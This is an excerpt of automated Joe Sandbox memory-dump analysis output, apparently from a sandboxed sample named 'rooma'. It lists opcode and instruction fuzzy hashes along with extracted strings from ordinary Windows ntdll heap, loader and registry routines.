                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            • API String ID: 0-3178619729
                                                            • Opcode ID: 0777d4cf8fcfc92f28f3f5625a5963f194178b3cdd867eea259b7030b1b32d1a
                                                            • Instruction ID: dfb266a225fd9f6d07768f2610308114d0b4188dba010612386f29e4a5a921fa
                                                            • Opcode Fuzzy Hash: 0777d4cf8fcfc92f28f3f5625a5963f194178b3cdd867eea259b7030b1b32d1a
                                                            • Instruction Fuzzy Hash: 5EE1D130A04A569BDB29CF28C495B7EBBF5BF48320F18885EE596CF246D734E940CB51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                            • Instruction ID: f29983a5c6bfca4f9ca0771e46d44eb12c801ce49ca42f8b09a3a0749fec1160
                                                            • Opcode Fuzzy Hash: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                            • Instruction Fuzzy Hash: 58A13C71D1162A9BDB359F68CC88BADB7B8FF48710F1041EAD909AB250E7359E84CF50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                            • API String ID: 0-373624363
                                                            • Opcode ID: 01003d9afecd71a049f1432d89626ff9e8c74d274f1b4dbdb1e0ddd67fec82c8
                                                            • Instruction ID: 1049b6269ef8e938ff3ac8a2644f09ef3dc8e16c685f41c3c0d06111bed360a2
                                                            • Opcode Fuzzy Hash: 01003d9afecd71a049f1432d89626ff9e8c74d274f1b4dbdb1e0ddd67fec82c8
                                                            • Instruction Fuzzy Hash: 4391E071A0524ACFFF21CF58E440BAEBBB1FF01354F144599E911AF290D378AA80CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %$&$@
                                                            • API String ID: 0-1537733988
                                                            • Opcode ID: 17e08b531f6b32ad20241d3dd074d2f322785c5748fe02aea92bf81b74240dca
                                                            • Instruction ID: bc8312751001a60ef25152d965ec1d632dc890142f21520927b099dcd8a1b1fd
                                                            • Opcode Fuzzy Hash: 17e08b531f6b32ad20241d3dd074d2f322785c5748fe02aea92bf81b74240dca
                                                            • Instruction Fuzzy Hash: 75719D705083429FD715DF68C980A2FBBE6BFC5B18F108A1DE4DA8B291D730D905CB96
                                                            Strings
                                                            • LdrpCompleteMapModule, xrefs: 015FA590
                                                            • minkernel\ntdll\ldrmap.c, xrefs: 015FA59A
                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 015FA589
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                            • API String ID: 0-1676968949
                                                            • Opcode ID: e3b2765093555bdfd2b21acf7c2b50ac2e41a019c187eb105255801c01b85b75
                                                            • Instruction ID: 5a675cc153be331df6c818c577d28ea75a0867f198c468f89758b3867de09aff
                                                            • Opcode Fuzzy Hash: e3b2765093555bdfd2b21acf7c2b50ac2e41a019c187eb105255801c01b85b75
                                                            • Instruction Fuzzy Hash: DF513530600B469BEB22CF6CD9D4BAE7BE4BF40714F180668EA559FAE2D770E840C741
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                            • API String ID: 0-1151232445
                                                            • Opcode ID: 1f7cd9d292e61f7700f8f6ca8ac0b9dd6b3230b358ecfb8435cd27fd0f2efbaa
                                                            • Instruction ID: 8684c570b37b9210d42cf919d0888dfec41466303f4f97809d819741f2e055ea
                                                            • Opcode Fuzzy Hash: 1f7cd9d292e61f7700f8f6ca8ac0b9dd6b3230b358ecfb8435cd27fd0f2efbaa
                                                            • Instruction Fuzzy Hash: E2412574B002808FEF29EF2EC48877D7BE0BF45348F2844A9D5669F296DA74D885C751
                                                            Strings
                                                            • PreferredUILanguages, xrefs: 0164C212
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164C1C5
                                                            • @, xrefs: 0164C1F1
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                            • Instruction ID: c499b643916bef4a51ba988129c7cf8eeac2772d9f48b1dac4cae7a6f380fad4
                                                            • Opcode Fuzzy Hash: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                            • Instruction Fuzzy Hash: 38416271E1120AEBDB11DED9CC51FEFBBB8BB54704F14806AE605B7340E7B49A458B50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                            • Instruction ID: d6f5a90e7c66356d33f3074fc264097ad29073c01750ff5a6f5e2b2d8083ac41
                                                            • Opcode Fuzzy Hash: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                            • Instruction Fuzzy Hash: 71410131A01A69CBEB229BE9CC44BACBBB8FF96340F244459D901EF381DB758901CF51
                                                            Strings
                                                            • SXS: %s() passed the empty activation context data, xrefs: 016029FE
                                                            • RtlCreateActivationContext, xrefs: 016029F9
                                                            • Actx , xrefs: 015C33AC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                            • API String ID: 0-859632880
                                                            • Opcode ID: 0c72e71325d889d95ddc49417bfb743e0fa687ea799d68e34cbdc0fa7e5ba8bd
                                                            • Instruction ID: 8e1f1b8c0461b7f7ee41e52cdb958695f38b78b6da82d76bf3d21f31ee6a3ca0
                                                            • Opcode Fuzzy Hash: 0c72e71325d889d95ddc49417bfb743e0fa687ea799d68e34cbdc0fa7e5ba8bd
                                                            • Instruction Fuzzy Hash: 093113326103069FEB26DE99DC98F9AB7A9BF44B10F05846DEE049F281DB74DC45C790
                                                            Strings
                                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0161B632
                                                            • GlobalFlag, xrefs: 0161B68F
                                                            • @, xrefs: 0161B670
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                            • API String ID: 0-4192008846
                                                            • Opcode ID: 5efbf2a445485835c0ead962ad7b96bb1940d40aa421ddc2cd2f92274228b108
                                                            • Instruction ID: 0c310955e0c21d49afd85917b0da03a7fa43cb9eb7d2a106ebbecbc381353646
                                                            • Opcode Fuzzy Hash: 5efbf2a445485835c0ead962ad7b96bb1940d40aa421ddc2cd2f92274228b108
                                                            • Instruction Fuzzy Hash: BA316FB190021AAFDB10EF99DC80EEEBB78FF54744F040469E604EB254D7749E00CBA4
                                                            Strings
                                                            • BuildLabEx, xrefs: 015D130F
                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 015D127B
                                                            • @, xrefs: 015D12A5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                            • API String ID: 0-3051831665
                                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                            • Instruction ID: e135d2f3bbef21175a88f96683adaed0fdd02d00039e3affb05818ed87d0a932
                                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                            • Instruction Fuzzy Hash: 1931737290051AAFDB25DF99CC44EDFBBBDFB94754F004425F614AB2A0EB70DA058B60
                                                            Strings
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01612104
                                                            • Process initialization failed with status 0x%08lx, xrefs: 016120F3
                                                            • LdrpInitializationFailure, xrefs: 016120FA
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                            • Instruction ID: 82ed088170871627eab7cf2df1020d1b3ee2f87abb402bfa4fa9cc247ef5346e
                                                            • Opcode Fuzzy Hash: 3d024ac136c10fb3b156c0fa01b52034fd525324b1302916ca5e04578d2e895a
                                                            • Instruction Fuzzy Hash: 2EF02234640309BBE724E64DDC53FAA3B68FB40B04F24045CFB006B785D2B0E980C684
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                            • Instruction ID: caae78899ba3c019b759af512f8b2a7a2d4815e10baaa71677096e014533ce93
                                                            • Opcode Fuzzy Hash: 60f6b0faa07c47b0d6657a799b9c9f341a7de3d2fe24bb2c6dd8a6ac6c02d17e
                                                            • Instruction Fuzzy Hash: 4D715D71A0014ADFDB11DFA8C990BAEB7F8FF48344F144069EA05EB291E634ED41CBA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@
                                                            • API String ID: 0-149943524
                                                            • Opcode ID: bffb8c2595361c714943ec848d23bfa5f6fa652648be385883e1e29d484dd5ed
                                                            • Instruction ID: 94d376bb6a95d9251b4d54d030391249373fedd734aaf8dfeec2769b333cc543
                                                            • Opcode Fuzzy Hash: bffb8c2595361c714943ec848d23bfa5f6fa652648be385883e1e29d484dd5ed
                                                            • Instruction Fuzzy Hash: 7C3279715583128FD7248F19C490B3EBBE1BF88754F94892EFA959F290E734D884CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: 46bf9d5aa0e49a6f98937b1f546f2cef9a9a5bd7f0d1cade37b8c344fc50d197
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: D4C1BF312043429BEB65CFA8CC41B6BBBE6BFC4318F084A2DFA968B291D775D505CB51
                                                            Strings
                                                            • kLsE, xrefs: 01590540
                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0159063D
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                            • API String ID: 0-2547482624
                                                            • Opcode ID: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                            • Instruction ID: c045c69b439c6e2276934af09093cb9bf7bfd8ef7f5a5cfb27137e803150397e
                                                            • Opcode Fuzzy Hash: 0b5c8fdca190b570f947a3c5990e41aeb8c6eda46b4814543564f76cf09f7fc5
                                                            • Instruction Fuzzy Hash: AE51B0715047429BDB24DF68C5406ABBBE9BFC4304F104C3EEA9A8B281E734D545CB92
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0159A309
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0159A2FB
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                            • Instruction ID: dab72030c4982cf8e8fd713ec913080950cf7c2fe30a1335dd2b963afb0e9e70
                                                            • Opcode Fuzzy Hash: 98e045a751d2da57daed018879231db87a1fdf968a984e93af757a5deafb5ff5
                                                            • Instruction Fuzzy Hash: F7418C71A0464ADBDB11CF59C840B6EBBF4FF84704F1444A9EE00DF295E2B5D940CBA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                            • API String ID: 0-118005554
                                                            • Opcode ID: 76002c2a11f70427e8e3c32f2ba4b82146cc727f57bdf96abfeef9d018a9f233
                                                            • Instruction ID: 57f3a99db1e7b4cb2ded511ae5ec83dcb002153b798a98d97841c451432aadc7
                                                            • Opcode Fuzzy Hash: 76002c2a11f70427e8e3c32f2ba4b82146cc727f57bdf96abfeef9d018a9f233
                                                            • Instruction Fuzzy Hash: 3531B231208B629BE321DF68D854B1AB7E8FF99754F040869F954CB390E778D905CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local\$@
                                                            • API String ID: 0-380025441
                                                            • Opcode ID: f3747bb372103617e8c8074fa78c39a2b377859f9a44b8c34ca89e58f02c4a56
                                                            • Instruction ID: 6ccdd7708367e9dad06f6395682c219bfa953eb17659ac314475d4e4ccf600be
                                                            • Opcode Fuzzy Hash: f3747bb372103617e8c8074fa78c39a2b377859f9a44b8c34ca89e58f02c4a56
                                                            • Instruction Fuzzy Hash: E5318F72548309AFD361DF68C880A6FBBE8FBC5A54F40492EF9958B250DA31DD04CB92
                                                            Strings
                                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 01602A95
                                                            • RtlpInitializeAssemblyStorageMap, xrefs: 01602A90
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                            • API String ID: 0-2653619699
                                                            • Opcode ID: 8b4a2b224222556027d817b2295780f22fb3cc5de6d0e4e6646254dd4c609eda
                                                            • Instruction ID: 37794c539f3298d6b0bc2af760e15b8c2078ff77f1a177a18a8d882c3c0a3fda
                                                            • Opcode Fuzzy Hash: 8b4a2b224222556027d817b2295780f22fb3cc5de6d0e4e6646254dd4c609eda
                                                            • Instruction Fuzzy Hash: F3110A75B00205AFE7268E8D9D85F6BB6A9BF94F54F14C06D7A04DF280DA74CD4086A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Cleanup Group$Threadpool!
                                                            • API String ID: 2994545307-4008356553
                                                            • Opcode ID: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                            • Instruction ID: 3ea5c3ae1ba7a6773c76e9554682b9610451a4ef26cb1637c3cc331e3a886b8b
                                                            • Opcode Fuzzy Hash: 063f751863b1a1ee458660fcad87b801983d5d153682114944f51a315432e6d2
                                                            • Instruction Fuzzy Hash: A001D1B2654748AFD321DF64CD45B167BE8F784B19F00893DA648CB190F374D844CB46
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c53ba43d1a00fe0e532c7b66f4bdf3d84253a3d627b0e7c5585c9b1ec0131ee4
                                                            • Instruction ID: 0aca4ca2847ba82dee03ca37a49ca955930db00698fd958fda8eb8ec7f36049b
                                                            • Opcode Fuzzy Hash: c53ba43d1a00fe0e532c7b66f4bdf3d84253a3d627b0e7c5585c9b1ec0131ee4
                                                            • Instruction Fuzzy Hash: B3A15BB1618742CFC721DF28C580A2EBBE6BF98704F14496EE5899B351E730E945CF92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PreferredUILanguages
                                                            • API String ID: 0-1884656846
                                                            • Opcode ID: 1b5488a437ba019c55985877294f5eb01af46ff087b2f3b84c82e3ef6444c00f
                                                            • Instruction ID: 6deb2ddf369540526a92ec701b5568871a9138528a186fefeb657a266cae7583
                                                            • Opcode Fuzzy Hash: 1b5488a437ba019c55985877294f5eb01af46ff087b2f3b84c82e3ef6444c00f
                                                            • Instruction Fuzzy Hash: 9D41A632D0021AEBDB12DA9ACC40AEEB7B9BF84750F054166EE11AB350DB34DD41C7A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: kLsE
                                                            • API String ID: 0-3058123920
                                                            • Opcode ID: cd628e3e22fa9c9a26cbd6a5d77a96f5b9c705a37cf71667f9373ec170254848
                                                            • Instruction ID: 672be125aa9855c54e57516ce3fd94ce6f32d8bb86734a125a68c3538531fda4
                                                            • Opcode Fuzzy Hash: cd628e3e22fa9c9a26cbd6a5d77a96f5b9c705a37cf71667f9373ec170254848
                                                            • Instruction Fuzzy Hash: EA4146B250135366EB31AB68EC84BAD3BA5BB91728F18131CED508F2C9CBB04495C7A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                            • Instruction ID: 2401c19472b915aba274033d89dfe66ed021ed50e044ff00a29c5e25e0bb9a56
                                                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                            • Instruction Fuzzy Hash: C6419F75A00656EFDF26DF88C890BBEB7B5FF98B11F00445AE9419B640EB30D941CBA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • Opcode ID: 844ba21f9cc08e9725ec436c48028719c3bbe2a6d2c3fbe7c57f4b49fd52fadd
                                                            • Instruction ID: e263eb94d7deea78b2777a416ab3c3c39ef99fe6fa40ac97e6e531b46cbf8eac
                                                            • Opcode Fuzzy Hash: 844ba21f9cc08e9725ec436c48028719c3bbe2a6d2c3fbe7c57f4b49fd52fadd
                                                            • Instruction Fuzzy Hash: 2911B6707656028BEF27491D885063AB7D6FB81264F34893BE692CF391F671DC618783
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrCreateEnclave
                                                            • API String ID: 0-3262589265
                                                            • Opcode ID: ad2409f360e628035c1f5b1afeb428ac9681f691359f7ce1bfbee8d9133d728c
                                                            • Instruction ID: b1ea5339821c948c59a30c72b5d12d1b7dd867200712ce52f6b89450f0f8972a
                                                            • Opcode Fuzzy Hash: ad2409f360e628035c1f5b1afeb428ac9681f691359f7ce1bfbee8d9133d728c
                                                            • Instruction Fuzzy Hash: D82104B15183459FC320DF2AC845A5BFBE8FBD5B10F004A1EBA909B354D7B0D405CB92
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39b579e8c22b26cbc51d66cd70c3e9c368ea4d0addb5eb9c78a3a22861e927ef
                                                            • Instruction ID: aab22b8a8cf37e6e7043fbd6c713cafee669122422ed3d1740e5e8f4861fa015
                                                            • Opcode Fuzzy Hash: 39b579e8c22b26cbc51d66cd70c3e9c368ea4d0addb5eb9c78a3a22861e927ef
                                                            • Instruction Fuzzy Hash: 1A427A71E006169FDB19CF59C884AAEBBF2FF8C214B248569D952AF341D734E942CBD0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a53f4fcd8a269e4b0936c8bb7417d4faa589ef114d236bae365ab04a3a80e364
                                                            • Instruction ID: cbed7d0c8d35b7b9e832d5b2e66e22f1b66f83be13a87c06377d0325a94bbab8
                                                            • Opcode Fuzzy Hash: a53f4fcd8a269e4b0936c8bb7417d4faa589ef114d236bae365ab04a3a80e364
                                                            • Instruction Fuzzy Hash: C6329C71E0021A9BDF24CFA8D891BEEBBB1FF94714F180129E905AF391E7759901CB91
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                            • Instruction ID: 8aaef71b6924779f4fd435707c30a502e69509182f759f1cee77b31ee7ade9d1
                                                            • Opcode Fuzzy Hash: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                            • Instruction Fuzzy Hash: B622BE742046618BEB25CFADC894772BBF1AF85300F08855AE9D6CF386D735E452EB60
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                            • Instruction ID: 51a62ff285a59cbe19d572b5a8d7a922ecfaff33d3c8de607962444ddff3cc9d
                                                            • Opcode Fuzzy Hash: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                            • Instruction Fuzzy Hash: 1FE17F71508342CFCB15CF28C590A6EBBE1FF89314F05896DE9998B351EB31E909CB92
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_1560000_rooma.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
